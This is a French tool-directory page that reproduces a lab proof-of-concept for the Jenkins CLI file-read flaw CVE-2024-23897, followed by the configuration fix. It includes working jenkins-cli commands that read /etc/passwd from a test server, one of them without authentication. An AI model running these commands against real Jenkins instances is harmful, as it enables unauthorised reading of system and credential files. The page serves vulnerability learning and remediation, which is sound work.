Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-Fix-jenkins-rce_CVE-2024-23897 — Sur ce git, vous pouvez trouver toutes les informations sur la CVE-2024-23897 | Kitploit
Outils/GitHubGitHub/10t4/poc-fix-jenkins-rce_cve-2024-23897
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHub10t4/poc-fix-jenkins-rce_cve-2024-23897

PoC-Fix-jenkins-rce_CVE-2024-23897

Sur ce git, vous pouvez trouver toutes les informations sur la CVE-2024-23897

Voir le dépôt
42il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC-jenkins-rce_CVE-2024-23897.

Sur ce dépôt Git, vous trouverez toutes les informations sur la CVE-2024-23897.

logo-jenkins

Introduction

Le problème, identifié par le CVE CVE-2024-23897, a été décrit comme une vulnérabilité de lecture de fichier arbitraire via l'interface en ligne de commande intégrée. Ce parseur de commandes possède une fonctionnalité qui remplace le caractère @ suivi d'un chemin de fichier dans un argument par le contenu du fichier (expandAtFiles). Cette fonctionnalité est activée par défaut et Jenkins 2.441 et versions antérieures, LTS 2.426.2 et versions antérieures ne la désactivent pas.

PoC

Pour ce PoC, j'ai installé Jenkins 2.426.2 avec Docker pour tester l'exploit de la vulnérabilité

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

Après avoir créé un utilisateur et un mot de passe, j'ai téléchargé le client CLI Jenkins (jenkins-cli.jar) sur ma machine d'attaque.

screen1
et ajouter la ligne :

Ensuite, j'ai écrit la commande pour l'exploit. Dans cette commande, nous avons besoin des identifiants de l'utilisateur Jenkins.

root@kitploit:~
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
screen2

Une autre commande permet d'afficher les premières lignes d'un fichier sans authentification.

root@kitploit:~
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
screen3

Correction de la vulnérabilité

Pour contrer cette vulnérabilité, vous devez naviguer vers le fichier de configuration Jenkins nommé config.xml (dans mon cas, il se trouve dans mon conteneur Docker, donc je passe en mode shell dans mon conteneur)

screen4
root@kitploit:~
<expandAtFiles>false</expandAtFiles>

et redémarrer Jenkins :

root@kitploit:~
service jenkins restart
Télécharger l’outil